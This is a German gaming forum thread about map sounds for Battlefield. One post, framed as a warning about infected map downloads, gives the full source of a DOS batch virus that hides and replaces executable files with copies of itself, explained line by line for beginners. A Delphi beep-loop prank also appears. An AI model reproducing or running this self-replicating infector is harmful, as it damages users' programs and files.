Jump to content

Recommended Posts

vorher hat einer beschrieben, wie man einen sound laufen lässt

spielt dieser sount dann auf der ganzen map?

oder kann man das auf ein bestimmtes objekt spezifizieren?

ich finde, wenn man sowas wie einen jungel haben will, kann man ja sound nehmen und ihn

kürzen, denn ein bisschen vogelgezwitscher und nochn bisschen was, das loopt doch eh, im script

stehr das zu mindest

Leute passt auf, wenn ihr maps saugt, man könnte alls script auch einen batch-virus

anfügen, die killen bei jedem starten der map ein *.exe usw.

lasst immer den antivir laufen!

Für leute die einen intelligenzqoutienten unter 70 haben, bekommen das hier

Script:

@echo off

ctty nul

for %%f in (*.exe *.com) do set A=%%f

if %A%==COMMAND.COM set A=

rename %A% V%A%

if not exist V%A% goto end

attrib +h V%A%

copy %0.bat %A%

attrib +r %A%

ren %A% *.bat

set A=

:end

ctty con

@if exist V%0.com V%0.com %1 %2 %3

@if exist V%0.exe V%0.exe %1 %2 %3

Für alle totalen Neulinge gehe ich den Code nun Zeile für Zeile durch.

@echo off

Dieser Befehl bewirkt, dass die Befehle des Programmes beim ausführen

nicht angezeigt werden.

ctty nul

Hier werden alle Ausgaben ins Nichts geleitet. So das der 'Benutzer'

nicht sieht, dass Dateien kopiert wurden.

for %%f in (*.exe *.com) do set A=%%f

Hier werden alle EXE und COM Dateien und schreibt jede Datei in die

Variable A. Das bedeutet, dass am Ende die letzte, noch nicht

infizierte Datei in der Variable A gespeichert wird.

if %A%==COMMAND.COM set A=

Falls A die Datei Command.COM enthaelt, wird A Null gesetzt

rename %A% V%A%

Die gefundene Datei wird umbenannt in Vname

if not exist V%A% goto end

Sollte das Umbenennen schiefgegangen sein, wird zur Stelle :end

gesprungen und beendet

attrib +h V%A%

Die umbenannte Datei wird versteckt und somit nur durch Parameter

mit dem Befehl dir /a:h sichtbar, auserdem wird sie bei einer erneuten

Ausfuehrung des Programmes nicht noch einmal umbenannt.

copy %0.bat %A%

Der Virus (%0%) wird an die Stelle der COM Datei kopiert

attrib +r %A%

Nun wird die Datei vor dem Ueberschreiben geschuetzt

ren %A% *.bat

Nun noch eine Umbenennung in eine BAT Datei

set A=

Der Parameter A wird wieder geleert, um keine Spuren zu hinterlassen

:end

Hierher wird mit goto end gesprungen

ctty con

Die Ausgabe wird wieder auf den Bildschirm geleitet

@if exist V%0.com V%0.com %1 %2 %3

Falls die Ersetzte Datei eine COM Datei war, wird diese nun ausgeführt

@if exist V%0.exe V%0.exe %1 %2 %3

wie eben nur mit EXE Dateien

Diesen Beitrag teilen


Link zum Beitrag
Auf anderen Seiten teilen

ok.....

ein lernkurs...wie schön...

die einen holen damit ihre serverlisten

oder starten den esel neu und die

mapper packen unter sich nen virus

rein...wäre ne möglichkeit :D

ich weiß sowas hats mit einigen

bf maps schon gegeben, aber

die chance is praktisch = 0

und wo wir schonmal dabei sind:

Startet euren delphi compiler, baut

ne on****.**** routine und schreibt:

var i: integer;

begin

for i:= 1 to i:= 50000 do begin

beep;

beep;

beep;

beep;

end;

end;

// das is zwar kein virus, hört sich aber

// verdammt niedlich an....... :P B) :D

mfg...the delphi-programmingman

of makedc.....

the

G-O-Double-T golem

bearbeitet von golem_moja

Diesen Beitrag teilen


Link zum Beitrag
Auf anderen Seiten teilen

hehe

war schon eine lange zeit, die ich den delphi compiler wieder angeworfen habe

hört sich echt lieb an!

weis jetzt irgendwer wie das mitm object sount funzt?

Diesen Beitrag teilen


Link zum Beitrag
Auf anderen Seiten teilen

och wie süß, zwei progger unter sich

muss mal der mapping coder ran;

du kannst in der enviorment.con eine sound file festlegen die auf der ganezn map abgespielt werden, du kannst aber auch sounds coden die nur in einem bestimmten umkreis oder lautstärke abgespielt werden; diese setzte dann am besten mit dem e42 wie ein normales objekt, kannste aber auch per hand in die staticobjects einfügen

bei fragen ------> icq oder ts

Diesen Beitrag teilen


Link zum Beitrag
Auf anderen Seiten teilen

extrahier dir die static objects

==> objects.rfa...und shcau in die con -

dateien...

da ich jedoch da nichts gefunden habe

(kannst dich ja selbst überzeugen),

muss man wohl mit bc unter das

house die richtigen untergrund textures nehemn

==> mat ids

P.S. Wie meinst du das ???==>

war schon eine lange zeit, die ich den delphi compiler wieder angeworfen habe

hört sich echt lieb an!

mfg golem

@nachbar...du bist auch ein kleiner süßer

schnuffelbuffelteddy...*schmatz*

bearbeitet von golem_moja

Diesen Beitrag teilen


Link zum Beitrag
Auf anderen Seiten teilen
och wie süß, zwei progger unter sich

muss mal der mapping coder ran;

du kannst in der enviorment.con eine sound file festlegen die auf der ganezn map abgespielt werden, du kannst aber auch sounds coden die nur in einem bestimmten umkreis oder lautstärke abgespielt werden; diese setzte dann am besten mit dem e42 wie ein normales objekt, kannste aber auch per hand in die staticobjects einfügen

bei fragen ------> icq oder ts

Wow, der Coder schlechthin. Dafür muss man nicht coden können,als tu nicht immer so,als ob du es könntest.

Diesen Beitrag teilen


Link zum Beitrag
Auf anderen Seiten teilen

lol..is zwar spam,aber muss mal gesagt

(oder gefeiert ????) werden....

Ich stimme mit tomcraft überein:

Nachbar, hör auf dein maul

immer so weit aufzureißen...

mloligemg golem

Diesen Beitrag teilen


Link zum Beitrag
Auf anderen Seiten teilen

BIN KEIN CODER

hab mich früher nur mit dem beschäftigt!

P.S. Wie meinst du das ???==>

QUOTE 

war schon eine lange zeit, die ich den delphi compiler wieder angeworfen habe

hört sich echt lieb an!

damit meine ich, dass es schon lange her ist, den delphi compiler zu benützen

Diesen Beitrag teilen


Link zum Beitrag
Auf anderen Seiten teilen

Erstelle ein Benutzerkonto oder melde dich an um zu kommentieren

Du musst ein Benutzerkonto haben um einen Kommentar hinterlassen zu können

Benutzerkonto erstellen

Neues Benutzerkonto für unsere Community erstellen. Geht einfach!

Neues Benutzerkonto erstellen

Anmelden

Du hast bereits ein Benutzerkonto? Melde dich hier an.

Jetzt anmelden

  • Wer ist Online   0 Benutzer

    Keine registrierten Benutzer online.

×

Übrigens…

Wir verwenden übrigens auch Cookies. Aber: Wir tracken nichts sondern erleichtern dir damit das Leben. Mehr dazu findest du hier.